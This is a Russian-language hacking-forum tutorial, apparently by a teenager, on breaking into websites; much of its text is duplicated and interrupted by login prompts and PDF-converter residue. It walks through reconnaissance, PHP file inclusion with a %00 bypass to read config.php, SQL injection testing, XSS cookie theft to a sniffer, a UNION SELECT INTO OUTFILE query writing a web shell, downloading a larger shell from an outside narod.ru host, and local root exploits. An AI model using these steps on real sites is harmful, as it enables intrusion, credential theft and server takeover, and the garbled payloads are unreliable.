HHIDE_DUMP
Гость
H
HHIDE_DUMP
Гость
Что разберем в теме?
1) Предварительный осмотр сайта
2) Атака
3) Шелл,РУТ
4) Личная безопасность
Немного о себе . Меня зовут Миша (Finik – мой псевдоним).Мне 14 лет. В области данной сферы я уже 5 лет . Знаю несколько языков программирования . Ладно не буду томить тебя .
И так …
Первое действие , для начала нужно определить вид сайта . Сайты бывают двух типов – со статическим или же динамическим наполнением . Второй тип попадается намного чаще , так что будем рассматривать его . Кстати , у вас наверное появился вопрос – ,,Как определить динамичный от статического сайта ?” , не беспокойтесь щас я вам все расскажу . Для статического контента свойственны страницы с расширениями *.htm, *.html (Но это не всегда так, т.к. можно прятать сценарии на PHP или ASP в виде HTML). Распознать статические страницы можно по их количеству, отсутствию параметров в адресной строке и прямым переходам на другие страницы. Для динамических сайтов характерны расширения *.php, *.phtml, *.php3, *.asp, *.aspx, *.jsp - это расширения языков обработки сценариев. Все , понял ? Поехали дальше
2 шаг
Возможно , сайт который вы хотите взломать состоит из 3-4 статических страниц и найти ошибки в коде в прямом смысле невозможно , но нам может помочь то что на одном сервере могут размещаться несколько сайтов , некоторые из них могут иметь динамическое наполнение или же вообще открытый доступ к админке . Помочь тебе может найти такие сайты специальные сервисы вот один из них :
3 шаг
Итак, зная многое о сайте, что можно ещё сделать? Можно просканировать «скрытый» контент сайта для получения нужной информации. Многие админы хотят, чтобы их детище было популярным у людей, поэтому они всячески пытаются завлечь к себе поисковые системы. Это делается для того, чтобы человек в поисках информации заходил на сайт через поисковые серверы (yandex.ru, rambler.ru, google.com, msn.com). У этих систем есть свои «добыватели информации» - роботы, которые ходят по всем ссылкам и все куда-то записывают, а потом выдают при нажатии на кнопку ПОИСК. Чтобы эти роботы не лазили куда им не следует, часто создают в корне сайта специальный файл с инструкциями боту. Он называется robots.txt. В нём иногда можно найти много интересной информации. Также можно просканировать весь сайт при помощи специальных утилит таких как NIKTO, Xspyder и др. (Все они в открытом доступе). Они помогут отыскать скрытые от наших глаз файлы и папки. А мы подходим к сладенькому
4 шаг
АТАКА
Надо определить какой движок управляет сайтом , я вам расскажу как это сделать .
- Надпись Powered by xxxxxxxx говорит, что название движка xxxxxxxx
- Стиль оформления такой же, как у движка yyyyyyy
- Название скриптов такое же, как у движка zzzzzzz.
Если вы поняли, какой движок управляет сайтом, то нужно поискать уязвимости самому, скачав такой же, или же, если не хватает знаний, то воспользоваться специализированными сайтами, вот несколько из них :
- XakNet.ru
- AntiChat.ru
- SecurityLab.ru
Там в специальных разделах лежит информация почти о всех уязвимостях известных движков, а также присутствуют сплоиты. Для самописных сайтов существуют несколько видов атак на веб- контент, самые распространённые:
- PHP-инъекции
- SQL-инъекции
- XSS-атаки.
Сейчас , я вам расскажу про все эти инъекции .
PHP-инъекции
PHP-инъекции – это вид атаки, при котором вместо положенной страницы взломщик выводит ту, которая ему нужна. Наличие данной уязвимости характерно для сайтов, у которых адресная строка выглядит примерно так – _
SQL-инъекции
Многие сайты хранят важную информацию в базах данных. Наиболее популярными в интернете считаются MySQL и MSSQL базы данных. Сайт при помощи запросов может обратиться к базе данных, она выдаст ответ, а скрипт выдаст его в нужном формате пользователю. Так вот, если изменить каким-то образом запрос, мы можем получить нужный нам результат. Проверить на наличие SQL-инъекции можно подставив в параметр символ «‘», который в базах данных является ограничителем запроса, т.е. если есть адрес _
htp://XakNet.ru
htp://AntiChat.ru
XSS-атаки
Этот вид атаки используется для получения Coockies админов. Если при вводе в какое-нибудь поле, например «ПОЛНОЕ ИМЯ» в гостевой книге, конструкции вида и последующем просмотре своей записи на экране появляется окно с open in browser PRO version Are you a developer? Try out the HTML to PDF API pdfcrowd.com Страница: 1 надписью «Admin – FUCK», то это говорит о наличии XSS-уязвимости. Если вставить специальный код, то при просмотре админом данного сообщения его куки прилетят к вам на сниффер, а в них пароль или его хэш, или сеcсия…
ШЕЛЛ
Итак, мы в админке, или имеем root-доступ к базе данных, или PHP-inj удаленного файла, или FTP-доступ к сайту, что дальше. А дальше еще проще: 1) FTP-доступ или АДМИНКА. Просто заливаем понравившийся вам скрипт шелла и к следующей главе. 2) PHP-inj. Заливаем скрипт шелла на какой-нибудь бесплатный хостинг, например, narod.ru, и инклудим его примерно так - _
РУТ
Залив шелл мы теперь можем выполнять команды на сервере, а первой командой будет id, которая показывает ваши права в системе, а они обычно скромные. Хочется большего, тогда смотрим, что за ОС стоит на сервере(команда uname –a). Под эту версию ищем сплойт на сайте , компилируем, запускаем(как это делать описано либо в начале самого сплойта, либо в статьях) и… руууууут! Цель достигнута.
1) Предварительный осмотр сайта
2) Атака
3) Шелл,РУТ
4) Личная безопасность
Немного о себе . Меня зовут Миша (Finik – мой псевдоним).Мне 14 лет. В области данной сферы я уже 5 лет . Знаю несколько языков программирования . Ладно не буду томить тебя .
И так …
Первое действие , для начала нужно определить вид сайта . Сайты бывают двух типов – со статическим или же динамическим наполнением . Второй тип попадается намного чаще , так что будем рассматривать его . Кстати , у вас наверное появился вопрос – ,,Как определить динамичный от статического сайта ?” , не беспокойтесь щас я вам все расскажу . Для статического контента свойственны страницы с расширениями *.htm, *.html (Но это не всегда так, т.к. можно прятать сценарии на PHP или ASP в виде HTML). Распознать статические страницы можно по их количеству, отсутствию параметров в адресной строке и прямым переходам на другие страницы. Для динамических сайтов характерны расширения *.php, *.phtml, *.php3, *.asp, *.aspx, *.jsp - это расширения языков обработки сценариев. Все , понял ? Поехали дальше
2 шаг
Возможно , сайт который вы хотите взломать состоит из 3-4 статических страниц и найти ошибки в коде в прямом смысле невозможно , но нам может помочь то что на одном сервере могут размещаться несколько сайтов , некоторые из них могут иметь динамическое наполнение или же вообще открытый доступ к админке . Помочь тебе может найти такие сайты специальные сервисы вот один из них :
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
3 шаг
Итак, зная многое о сайте, что можно ещё сделать? Можно просканировать «скрытый» контент сайта для получения нужной информации. Многие админы хотят, чтобы их детище было популярным у людей, поэтому они всячески пытаются завлечь к себе поисковые системы. Это делается для того, чтобы человек в поисках информации заходил на сайт через поисковые серверы (yandex.ru, rambler.ru, google.com, msn.com). У этих систем есть свои «добыватели информации» - роботы, которые ходят по всем ссылкам и все куда-то записывают, а потом выдают при нажатии на кнопку ПОИСК. Чтобы эти роботы не лазили куда им не следует, часто создают в корне сайта специальный файл с инструкциями боту. Он называется robots.txt. В нём иногда можно найти много интересной информации. Также можно просканировать весь сайт при помощи специальных утилит таких как NIKTO, Xspyder и др. (Все они в открытом доступе). Они помогут отыскать скрытые от наших глаз файлы и папки. А мы подходим к сладенькому
4 шаг
АТАКА
Надо определить какой движок управляет сайтом , я вам расскажу как это сделать .
- Надпись Powered by xxxxxxxx говорит, что название движка xxxxxxxx
- Стиль оформления такой же, как у движка yyyyyyy
- Название скриптов такое же, как у движка zzzzzzz.
Если вы поняли, какой движок управляет сайтом, то нужно поискать уязвимости самому, скачав такой же, или же, если не хватает знаний, то воспользоваться специализированными сайтами, вот несколько из них :
- XakNet.ru
- AntiChat.ru
- SecurityLab.ru
Там в специальных разделах лежит информация почти о всех уязвимостях известных движков, а также присутствуют сплоиты. Для самописных сайтов существуют несколько видов атак на веб- контент, самые распространённые:
- PHP-инъекции
- SQL-инъекции
- XSS-атаки.
Сейчас , я вам расскажу про все эти инъекции .
PHP-инъекции
PHP-инъекции – это вид атаки, при котором вместо положенной страницы взломщик выводит ту, которая ему нужна. Наличие данной уязвимости характерно для сайтов, у которых адресная строка выглядит примерно так – _
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
- это идеальная PHP-инъеция, при которой скрипт не проверяет(в большинстве случаев) ни название файла, ни его расширение. Есть инъекции, при которых расширение файла дописывается самим скриптом - _Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
- выведет страницу finik.html. Для обхода данного «запрета» (А нам нужно вывести например файл с паролями от базы данных – config.php) используется баг, суть которого состоит в том, что в конце полного названия файла ещё приписывается %00, т.е. адрес примет вид _Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
page=config.php%00 (%00 означает «конец строки»). Таким образом на экране(или в коде страницы) выведется содержимое файла config.php .SQL-инъекции
Многие сайты хранят важную информацию в базах данных. Наиболее популярными в интернете считаются MySQL и MSSQL базы данных. Сайт при помощи запросов может обратиться к базе данных, она выдаст ответ, а скрипт выдаст его в нужном формате пользователю. Так вот, если изменить каким-то образом запрос, мы можем получить нужный нам результат. Проверить на наличие SQL-инъекции можно подставив в параметр символ «‘», который в базах данных является ограничителем запроса, т.е. если есть адрес _
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
и мы подставив ‘ после параметра 365 - _Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
получаем вместо вывода на экран информации ошибку, то это говорит о наличии SQL-инъекции. Дальше – все зависит от вида и версии базы данных. Описывать здесь все подвиды SQL-атак я не буду, т.к. объём статьи сразу увеличится в разы, но с радостью скажу где про это можно почитать подробно, т.к. статей по данному виду уязвимостей - множество. Вот ссылки на некоторые ,специализированные сайты:htp://XakNet.ru
htp://AntiChat.ru
XSS-атаки
Этот вид атаки используется для получения Coockies админов. Если при вводе в какое-нибудь поле, например «ПОЛНОЕ ИМЯ» в гостевой книге, конструкции вида и последующем просмотре своей записи на экране появляется окно с open in browser PRO version Are you a developer? Try out the HTML to PDF API pdfcrowd.com Страница: 1 надписью «Admin – FUCK», то это говорит о наличии XSS-уязвимости. Если вставить специальный код, то при просмотре админом данного сообщения его куки прилетят к вам на сниффер, а в них пароль или его хэш, или сеcсия…
ШЕЛЛ
Итак, мы в админке, или имеем root-доступ к базе данных, или PHP-inj удаленного файла, или FTP-доступ к сайту, что дальше. А дальше еще проще: 1) FTP-доступ или АДМИНКА. Просто заливаем понравившийся вам скрипт шелла и к следующей главе. 2) PHP-inj. Заливаем скрипт шелла на какой-нибудь бесплатный хостинг, например, narod.ru, и инклудим его примерно так - _
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
, потом заливаем шелл прямо на сайт. 3) Root MySQL – если не фильтруется кавычка, то можно залить шелл при помощи запроса _Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
1+union+select+1,2,3,4,5,6,,,,, 0x3C3F20,3,9,3,4656D2,245F4,45545B2,632,5D293B203F 3E,10,11,12,13,14,15,16+FROM+mysql.user+INTO+OUTFI LE+'/home/www/shell.php'/*, где 0x3C3F20,3,9,3,4656D2,245F4,45545B2,632,5D293B203F 3E – это закодированное выражение , позволяющее выполнять команды на сервере. Далее заливаем более удобный для работы шелл командой _htp://Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
-O shell.php _htp://vasiliy.narod.ru/shell.php.РУТ
Залив шелл мы теперь можем выполнять команды на сервере, а первой командой будет id, которая показывает ваши права в системе, а они обычно скромные. Хочется большего, тогда смотрим, что за ОС стоит на сервере(команда uname –a). Под эту версию ищем сплойт на сайте , компилируем, запускаем(как это делать описано либо в начале самого сплойта, либо в статьях) и… руууууут! Цель достигнута.